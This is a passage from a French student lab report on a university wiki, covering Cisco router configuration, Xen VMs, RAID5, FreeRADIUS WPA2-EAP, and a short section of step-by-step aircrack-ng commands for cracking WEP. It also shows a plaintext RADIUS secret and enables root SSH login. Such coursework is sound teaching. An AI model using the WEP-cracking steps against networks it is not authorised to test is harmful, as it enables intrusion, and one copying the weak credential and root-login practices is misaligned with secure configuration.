 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
